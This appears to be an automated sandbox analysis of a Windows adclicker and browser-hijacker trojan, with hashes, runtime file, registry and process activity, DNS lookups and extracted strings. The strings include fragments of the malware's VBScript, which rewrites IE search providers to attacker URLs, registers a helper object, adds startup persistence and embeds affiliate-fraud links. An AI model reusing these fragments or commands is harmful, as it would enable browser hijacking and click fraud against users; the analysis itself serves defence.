Analysis Date: 2014-03-02 14:39:52
MD5: 64be3dc5e93a1006919b4c52bddcae52
SHA1: ffbc3bff8926ca4085f8ec9e393e767b231d9c1b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: UPX0 md5: 7230075380b7280f3e2859b980580b33 sha1: adbe5aa7fa7832dfbdb4ec3f0288127f63e01125 size: 147456
Section: UPX1 md5: 4084e1dfb1e28e8148f85afc4542b0d2 sha1: e28c8db36f94e59d8767213a2e0e2d8584e95587 size: 38912
Section: .rsrc md5: 5fc1f79cbd0cb3d357c338dccff9c68f sha1: 6a44da45557968eadbd63ba067bf70f9e5a72aa2 size: 8192
Timestamp: 2010-05-16 13:58:29
Version:
InternalName: bho
FileVersion: 1.00
CompanyName: 微软中国
ProductName: Install
ProductVersion: 1.00
OriginalFilename: bho.exe
Packer: Microsoft Visual Basic v5.0
PEhash: 3905e0b48dc1ae1a798de15617de09e05ae086bc
IMPhash: 87e2b4affcdfc34a066df66430210947
AV (mcafee): AdClicker-IX
AV (msse): TrojanClicker:Win32/VB.CQ
AV (avira): TR/BHO.agkj.17

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\WINDOWS\myhost\dlldll.vbe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\dlldll.vbe
Creates File: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\system.vbe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFCC90.tmp
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\reg.reg
Creates File: C:\WINDOWS\hi\Qvod7544.062.dll
Creates File: C:\WINDOWS\WindowsStrongIndex.reg
Creates File: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\iesearch.vbe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\iecollection.vbe
Creates File: C:\WINDOWS\hi\smss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014030220140303\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\index.dat
Creates Process: cmd /c regedit.exe /s C:\WINDOWS\reg.reg
Creates Process: cmd /c regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg
Creates Process: regsvr32.exe /s "C:\WINDOWS\hi\Qvod7544.062.dll"
Creates Process: C:\WINDOWS\hi\smss.exe
Creates Mutex: _!SHMSFTHISTORY!_
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014030220140303!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: tongji.dianxin.cn
Winsock DNS: www.mylovewebs.cn

Process
↳ cmd /c regedit.exe /s C:\WINDOWS\reg.reg

Creates Process: regedit.exe /s C:\WINDOWS\reg.reg

Process
↳ cmd /c regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg

Creates Process: regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg

Process
↳ C:\WINDOWS\hi\smss.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFE19.tmp
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Winsock DNS: www.mylovewebs.com
Winsock DNS: stat.aectime.com

Process
↳ regsvr32.exe /s "C:\WINDOWS\hi\Qvod7544.062.dll"

Registry: HKEY_CLASSES_ROOT\QvodAdBlocker.QvodBlock\ ➝ QvodAdBlocker.QvodBlock\\x00
Registry: HKEY_CLASSES_ROOT\Interface\{C4DABBBE-E3A6-4042-B1EE-DA2F0588A122}\ ➝ QvodBlock\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{B8804261-8DC9-4356-AB35-296E07D53A96}\ ➝ QvodAdBlocker.QvodBlock\\x00

Process
↳ regedit.exe /s C:\WINDOWS\reg.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B8804261-8DC9-4356-AB35-296E07D53A96}\ ➝ ??????\\x00

Process
↳ regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg

Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\Command\ ➝ Rundll32.exe\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\ ➝ ????(&H)\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\InProcServer32\ ➝ %SystemRoot%\system32\shdocvw.dll\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ShellFolder\ ➝ 00.00.00.00\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\DefaultIcon\ ➝ C:\Program Files\Internet Explorer\iexplore.exe,0\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ ➝ Internet Explorer\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}\ ➝ Internet Explorer\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\ ➝ ??(&D)\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command\ ➝ C:\Program Files\Internet Explorer\iexplore.exe http://www.dianxin.cn?Lnk\\x00
Registry: HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\??(&R)\Command\ ➝ rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0\\x00

Network Details:

DNS: www.mylovewebs.com
Type: A
DNS: stat.aectime.com
Type: A
DNS: tongji.dianxin.cn
Type: A
DNS: www.mylovewebs.cn
Type: A


Strings
o
.

@="00.00.00.00"
080404B0
1.00
118114
12043901_0_0
127.0.0.1
@200#
5.03.0251
about:blank
about:Tabs
aectime
*\AH:\U
alimama
AllUsersStartup
appendChild
async
"Attributes"=hex:00,00,00,00
{B8804261-8DC9-4356-AB35-296E07D53A96}
baidu
\BHO
bho.exe
bingj
body
\??\C:
Call Main
Charset
Click
cmd /c regedit.exe /s 
.com/data.xml
CompanyName
.com/tongji.htm?smss
count
C:\Program Files
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
createElement
CUSTOM
" /d "
(&D)"
dangdang.com
?dangdang_id=P-273667
&dangdang_id=P-273667
/Data/OpenUrl
/Data/OpenUrlTime
/Data/Url
    dim exePath
.dll
\dlldll.vbe
dlldll.vbe
{dll_path}
Document
documentElement
doubleclick
Edit
End Sub
.exe 
ExecQuery
execScript
    exePath="
" /f
FileDescription
FileVersion
gb2312
getAttribute
getElementsByTagName
google
googleadservices
(&H)"
Height
\hi\
Hide
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\DefaultIcon]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\InProcServer32]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ShellFolder]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\Command]
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}]
\hostbhoreg.reg
\host.DLL
href
http://
http://168.xoyo.com/
http://168.xoyo.com/80629156
http://h1.untang.com/jump.vip?s=5007684|7185
http://hao.360.cn/
http://js5.18
http://mall.taobao.com/
http://my.xoyo.com/Personinfo/reg/
https://pass.kingsoft.com/register-reg
http://stat.
http://taobao.com
http://taobao.com/
http://tg.sdo.com/1119148908
http://tongji.dianxin.cn/api/work.aspx?cmd=
http://union.dangdang.com/transfer/transfer.aspx?from=P-273667&backurl=
http://w
http://www.
http://www.114la.com/
http://www.2345.com/
http://www.amazon.cn
http://www.amazon.cn/
http://www.amazon.cn/mn/assocLinkApp?action=asso_search&k=2&source=soarem-23
http://www.amazon.cn/mn/channel?ref=GT&pageletid=xinjiang&uid=475-0678279-4240539&channelCode=book
http://www.amazon.cn/mn/channel?ref=GT&pageletid=xinjiang&uid=475-0678279-4240539&channelCode=mobile
http://www.amazon.cn/mn/channel?ref=GT&pageletid=xinjiang&uid=475-0678279-4240539&channelCode=toy
http://www.amazon.cn/mn/gt?pageletid=headother
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=11&keywords=
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=1&keywords=
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=2&keywords=
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=5&keywords=
http://www.baidu.com
http://www.baidu.com/
http://www.dianxin.cn?Lnk
http://www.hao123.com/
http://www.mylovewebs.com/api/baidu/index.htm
http://www.mylovewebs.com/api/index/index.htm
http://www.mylovewebs.com/api/sogou/index.htm
http://www.mylovewebs.com/api/taobao/index.htm
http://www.mylovewebs.com/daohangad.htm
http://www.paipai.com/
http://www.sogou.com
http://www.sogou.com/
http://www.taobao.com
http://www.taobao.com/
http://youa.baidu.com/content/index.html
\IEAdBlocker.vbp
\iecollection.vbe
IEFrame
\iesearch.vbe
\ie.vbe
\ie.vbp
_IID_QVODBLOCK
Install
\Install.vbp
InternalName
@="Internet Explorer"
IPAddress
javascript:
jpeg
@@,l
Left
length
Load
Macaddress
Maxthon2_Frame
Microsoft.XMLDOM
Microsoft.XMLHTTP
{move_path}
\myhost\
mylovewebs
mymss
o.com/ie.js
OLESelfRegister
onClick
On Error Resume Next
onmousedown
onMouseDown
open
Open
OriginalFilename
ovewebs.cn/go.htm
ovewebs.com/api/tanchuang/url.htm
ovewebs.com/tongji.htm?id=
P-273667
parentwindow
ProductName
ProductVersion
Qvod
Qvod64
Qvod64.dll
(&R)]
(&R)\Command]
ReadyState
redirect.php
reg add 
REG_DWORD
register.sdo.com/PTNew/index.aspx?from=0
reg.kaixin.com/register.do
{regPath}
\reg.reg
reg.renren.com
regsvr32.exe /s "
Regwrite
responseText
RichEdit20W
/root/cimv2
@="Rundll32.exe"
@="rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0"
safemon
SCRIPT
scrollby
sdo.com
search_web.html
Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE
Select * From Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE
selectNodes
selectSingleNode
send
    Set ws = CreateObject("WScript.Shell")
    Set WshShell= CreateObject("WScript.Shell")
    Set WshShell = Nothing
smss
smss.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run\360Disabled
sogou
SpecialFolders
Startup
stat_kw.html
StringFileInfo
Sub Main()
SYSTEM
@="%SystemRoot%\\system32\\shdocvw.dll"
\system.vbe
taobao.com
{taobao_guid}
 Tencent Traveler 
Text
tg.sdo.com/1
Translation
\*.txt
TYPELIB
 /v "
VarFileInfo
VBForm
VS_VERSION_INFO
Width
windir
window.alert=null;
window.confirm=null;
window.open=null;
Windows
window.showModalDialog=null;
Windows Registry Editor Version 5.00
\WindowsStrongIndex.reg
winmgmts:
winmgmts://
Wscript.shell
WSCRIPT.SHELL
    wscript.sleep 60*1000
    WshShell.Run exePath
ww.myl
www.taobao.com/go/chn/store/index.php
XFrame_Wnd
xoyo.com
youdao
yyyy-mm-dd
      
        
         
                
                         
         '
        '
(000(#
02$8-81
0aStrToHex
<0=@=D=H=
}=0K!&
0W@W/f
1069DEA
1.0 CLASQvodBlock
-11D0-BFE9|
1E04581-4E
\1l1t1x1|1
2"-089
2(2,2024282<2X2l2
2$2(2,242<2@2D2H2L2P2T2X2\2`2d2t2x2|2
2(232C2[2f2
;(<2<C<
2VVVVVVVVVVVV
31a5(c
3 3&3,32383>3D3J3P3V3\3b3h3n3t3z3
33333333
33333333333354.wf
3,34383<3V3[3`3l3q3v3
3'3L3y3
3"4,474G4V4`4k4r4x4
\389u 
4"4(4.444:4@4F4L4R4X4^4d4j4p4v4|4
:4;8;D;`;p;
4E334.6
5(60646<6@6D6X8d8l8x8|8
?5aaG!
5h5r5}5
6%606:6g6
%69@5*3)
6$D98D
;6;?;^;d;t;z;
6ZCm1q
![745)
78m<jp
871C5380-42A
>*>8>B>I>c>o>
8J8^8y8
8<M-JCP/E1
8}@_QvodBlockWWd
9 9(989H9P9d9h9l9p9t9x9|9
9A}\}F
a?5bb3
ADForms
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
AdMainss
adTimer
advapi32.dll
adWebBrowser
_allmul
    allUsersPcDesktopPath = wshShell.SpecialFolders("AllUsersDesktop") '
    allUsersPcDesktopPath = WshShell.SpecialFolders("AllUsersDesktop") '
    allUsersPrograms = wshShell.SpecialFolders("AllUsersPrograms") '
    allUsersStartMenu = wshShell.SpecialFolders("AllUsersStartMenu") '
autoTimer
B580CF65-E151-49C3-B73F-70B13Fc-
b/g	gP
bigNodeName
bingWebBrowser
:Bsf9Bs{7Bs
CA8E86J
    Call CreateLnk("
        Call CreateLnk(url)
        Call IeIndex(url)        
    Call IeLink("
    Call IeLink("4399
    Call IeLink("Google
    Call IeSearch()
Call Main
        Call ReplaceBrowserLink(url)
        Call SetBhoo
    Call ShowIeLink
?CEF59
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
className
classNames
CloseHandle
Cookies
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateFile
CreateToolhelp32Snapshot
c{)ScU
C:\WINDOWS\system32\ieframe.dll
C:\WINDOWS\system32\ieframe.oca
C:\WINDOWS\system32\msvbvm60.dll\3
(&D)"""
d1ao65"
D.!AH,
`.data
    dataHome=OperationRegistry.RegRead("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command\") 
    data=OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\" & taobao_guid & "\") 
    data=OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}\") 
DelAllClick
DelClick
DelRegValue
deU2")=
;=d"hn
    Dim allUsersPcDesktopPath, allQuickLaunch, allUsersPrograms, allUsersStartMenu
    Dim allUsersPcDesktopPath, allUsersPrograms, allUsersStartMenu
    Dim allUsersPcDesktopPath,ieLinkPath
    Dim data
    Dim data,dataHome
    Dim directory
    Dim dll_path,move_path,taobao_guid,regPath
dim ie
    Dim ieLinkPath
    dim ie_temp_path
        dim index
    Dim lnkPath(7)
    Dim maxthonLinkPath
    Dim OperationRegistry 
    Dim regPath
    Dim regPathSeven
    Dim regPathSix 
    Dim startup
    Dim strDesktop, pcDesktopPath, quickLaunch, strQuickLaunch, programs, startMenu
dim tips_count
    dim url
    Dim wshShell, oShellLink
        directory = lnkPath(i)        
        directory=startup'
DllCanUnloadNow
DllFunctionCall
DllGetClassObject
    dll_path="{dll_path}"
DllRegisterServer
DllUnregisterServer
    do         
DU\-s[q
e4,5du
e,d1bf
EF (N	00	C
    else
End Function
                end if
            end if
    end if
        End if    
            End If
    End If
End Sub
EnumProcessModules
EnumWindows
EsEjGs
EsetGs
Es$FGs
EVENT_SINK2_AddRef
EVENT_SINK2_Release
EVENT_SINK_AddRef
EVENT_SINK_GetIDsOfNames
EVENT_SINK_Invoke
EVENT_SINK_QueryInterface
EVENT_SINK_Release
ewdtup!
            execute "dim   wind_"   &   index   
            execute "set wind_"   &   index   &   "=fso.opentextfile(""" & myName & """)"
exeName
        Exit Function
ExitProcess
=(=F=`=
	    f1.WriteLine "@=""
	    f1.WriteLine "@=""00.00.00.00"""
	    f1.WriteLine """Attributes""=hex:00,00,00,00"
    f1.WriteLine """DefaultScope""=""{B2D17A31-2642-4D03-9D1F-ABD3BE1DCC4E}"""
    f1.WriteLine """DisplayName""=""
    f1.WriteLine """DisplayName""=""Google"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{B2D17A31-2642-4D03-9D1F-ABD3BE1DCC4E}.ico"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{CEF59996-ACD3-43B5-80AA-FAAA6CDD98DE}.ico"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{E140FB5B-2A9D-4FA4-A20F-089B92412200}.ico"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{F8032AB1-9479-4E5E-8417-9A4207FE9F7F}.ico"""
    f1.WriteLine """FaviconURL""=""http://www.baidu.com/favicon.ico"""
    f1.WriteLine """FaviconURL""=""http://www.google.cn/favicon.ico"""
    f1.WriteLine """FaviconURL""=""http://www.sogou.com/favicon.ico"""
    f1.WriteLine """FaviconURL""=""http://www.taobao.com/favicon.ico"""
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}]" '
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\DefaultIcon]" '
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\InProcServer32]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ShellFolder]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\Command]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{B2D17A31-2642-4D03-9D1F-ABD3BE1DCC4E}]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{CEF59996-ACD3-43B5-80AA-FAAA6CDD98DE}]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{E140FB5B-2A9D-4FA4-A20F-089B92412200}]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{F8032AB1-9479-4E5E-8417-9A4207FE9F7F}]"
	    f1.WriteLine "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\" & taobao_guid & "]"
	    f1.WriteLine "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}]" '
	    f1.WriteLine "@=""Internet Explorer""" '
    f1.WriteLine """OSDFileURL""=""http://www.mylo" & "vew" &  "bs.com/api/baidu/open.xml"""
    f1.WriteLine """OSDFileURL""=""http://www.mylo" & "ve" &  "wbs.com/" & "api" & "/google/open.xml"""
    f1.WriteLine """OSDFileURL""=""http://www.myl" & "ovew" &  "bs.com/api/sogou/open.xml"""
    f1.WriteLine """OSDFileURL""=""http://www.mylo" & "ve" &  "wbs.com/" & "api" & "/taobao/open.xml"""
	    f1.WriteLine "@=""" & Replace(ie_temp_path, "\", "\\") & ",0""" '
	    f1.WriteLine "@=""" & Replace(ie_temp_path, "\", "\\") & " " & url & """" '
	    f1.WriteLine "@=""Rundll32.exe"""
	    f1.WriteLine "@=""rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0"""
    f1.WriteLine """SortIndex""=dword:00000001"
    f1.WriteLine """SortIndex""=dword:00000002"
    f1.WriteLine """SortIndex""=dword:00000005"
    f1.WriteLine """SortIndex""=dword:00000006"
	    f1.WriteLine "@=""%SystemRoot%\\system32\\shdocvw.dll"""
    f1.WriteLine """URL""=""http://www." & "my" &  "l" & "ove" &  "webs.com/" & "api" & "/baidu/so.htm?word={searchTerms}"""
    f1.WriteLine """URL""=""http://www.mylo" & "vew" &  "ebs.com/" & "api" & "/google/so.htm?word={searchTerms}"""
    f1.WriteLine """URL""=""http://www." & "my" &  "l" & "ov" &  "ewebs.com/" & "api" & "/sogou/so.htm?word={searchTerms}"""
    f1.WriteLine """URL""=""http://www." & "myl" &  "o" & "vew" &  "ebs.com/" & "api" & "/taobao/so.htm?word={searchTerms}"""
	    f1.WriteLine "Windows Registry Editor Version 5.00"
	f1.WriteLine "Windows Registry Editor Version 5.00"
F2CF5484E
F.3nB1-9479R@`
fD7\7i[))OV	
FDDDDDhA
]f/E@4
fHE7hfnC
                file.attributes=0'
	        file.attributes=0
	file.attributes=0
	file.attributes=0    
    file.attributes=1
    file.attributes=1 
	            file.attributes=1
	        file.attributes=1           
FileName
FindWindowA
FindWindowExA
Fm_ie_DocumentComplete
        For Each flie in fc  
        For Each flie in fc    
    For i = LBound(lnkPath) + 1 To UBound(lnkPath)
Form_Main
Fs0jGs
    fso.copyfile dll_path,move_path
        fso.copyfile move_path,dll_path
    f.WriteLine ""
    f.WriteLine "  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
    f.WriteLine "  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine "  00,00,00,00,00,00,00,00,00,5b,01,14,00,1f,50,e0,4f,d0,20,ea,3a,69,10,a2,d8,\"
    f.WriteLine "  00,00,00,00,00,00,00,00,4c,00,00,00,01,14,02,00,00,00,00,00,c0,00,00,00,00,\"
    f.WriteLine "  00,00,00,00,00,00,5c,00,31,00,00,00,00,00,8c,3a,cb,23,10,00,44,4f,43,55,4d,\"
    f.WriteLine "  00,00,00,00,00,00,5c,00,31,00,00,00,00,00,8e,3a,b9,15,10,00,44,4f,43,55,4d,\"
    f.WriteLine "  00,00,00,00,00,00,5c,00,31,00,00,00,00,00,a5,3c,28,4a,10,00,44,4f,43,55,4d,\"
    f.WriteLine "  00,00,00,00,00,8c,3a,ce,23,11,00,46,41,56,4f,52,49,7e,31,00,00,3e,00,03,00,\"
    f.WriteLine "  00,00,00,00,00,a2,3c,80,96,11,00,46,41,56,4f,52,49,7e,31,00,00,3e,00,03,00,\"
    f.WriteLine "  00,00,00,00,00,a6,3c,76,0f,11,00,46,41,56,4f,52,49,7e,31,00,00,3e,00,03,00,\"
    f.WriteLine "  00,00,00,02,00,00,00,21,07,00,00,a0,0f,00,00,04,00,00,00,21,01,00,00,a0,0f,\"
    f.WriteLine "  00,00,00,02,00,00,00,a1,06,00,00,60,01,00,00,04,00,00,00,a1,00,00,00,c6,00,\"
    f.WriteLine "  00,00,03,00,00,00,20,03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine "  00,00,03,00,00,00,a1,02,00,00,d4,04,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine "  00,00,46,81,00,00,00,10,00,00,00,10,a1,55,c0,ff,e9,ca,01,18,bf,0f,fd,11,ed,\"
    f.WriteLine "  00,00,46,81,00,00,00,10,00,00,00,9e,d1,0e,c2,33,ec,ca,01,e6,1a,bf,65,c5,ed,\"
    f.WriteLine "  00,00,46,81,00,00,00,10,00,00,00,fe,b8,49,65,27,bb,c9,01,12,c0,b1,6e,27,bb,\"
    f.WriteLine "[{000214A0-0000-0000-C000-000000000046}]"
    f.WriteLine "  00,04,00,ef,be,8c,3a,cb,23,8c,3a,cc,23,14,00,00,00,41,00,64,00,6d,00,69,00,\"
    f.WriteLine "  00,04,00,ef,be,8c,3a,cb,23,a5,3c,05,86,14,00,00,00,41,00,64,00,6d,00,69,00,\"
    f.WriteLine "  00,04,00,ef,be,a5,3c,28,4a,a7,3c,f1,48,14,00,00,00,41,00,64,00,6d,00,69,00,\"
    f.WriteLine "  00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,00,00,18,00,4a,00,\"
    f.WriteLine "  00,69,00,74,00,65,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,\"
    f.WriteLine """{01E04581-4EEE-11D0-BFE9-00AA005B4383}""=hex:81,45,e0,01,ee,4e,d0,11,bf,e9,00,\"
    f.WriteLine "  04,00,ef,be,8c,3a,cb,23,8c,3a,ce,23,14,00,28,00,46,00,61,00,76,00,6f,00,72,\"
    f.WriteLine "  04,00,ef,be,a2,3c,00,70,a2,3c,80,96,14,00,28,00,46,00,61,00,76,00,6f,00,72,\"
    f.WriteLine "  04,00,ef,be,a5,3c,28,4a,a7,3c,33,44,14,00,28,00,46,00,61,00,76,00,6f,00,72,\"
    f.WriteLine "  08,00,2b,30,30,9d,19,00,2f,43,3a,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine """{0E5CBF21-D15F-11D0-8301-00AA005B4383}""=hex:21,bf,5c,0e,5f,d1,d0,11,83,01,00,\"
    f.WriteLine "[1]"
    f.WriteLine "  17,a7,2f,9d,10,1c,92,a9,ac,9d,ce,58,df,11,a8,ce,00,1e,65,ca,82,46,08,ff,f6,\"
    f.WriteLine "  17,a7,2f,9d,10,1c,dd,0c,5a,86,1a,27,de,11,b2,8a,86,62,af,bb,9f,a2,08,ff,f6,\"
    f.WriteLine "  18,08,88,87,00,00,00,00"
    f.WriteLine "[2]"
    f.WriteLine "  2a,00,00,00,01,00,00,00,80,06,00,00,80,01,00,00,03,00,00,00,81,02,00,00,00,\"
    f.WriteLine "  2d,e9,27,70,49,22,00,1c,00,08,00,00,00,06,00,00,00,01,00,00,00,00,00,00,00,\"
    f.WriteLine "[3]"
    f.WriteLine "  31,00,00,00,00,00,8c,3a,cc,23,10,00,41,44,4d,49,4e,49,7e,31,00,00,32,00,03,\"
    f.WriteLine "  31,00,00,00,00,00,a5,3c,05,86,10,00,41,44,4d,49,4e,49,7e,31,00,00,32,00,03,\"
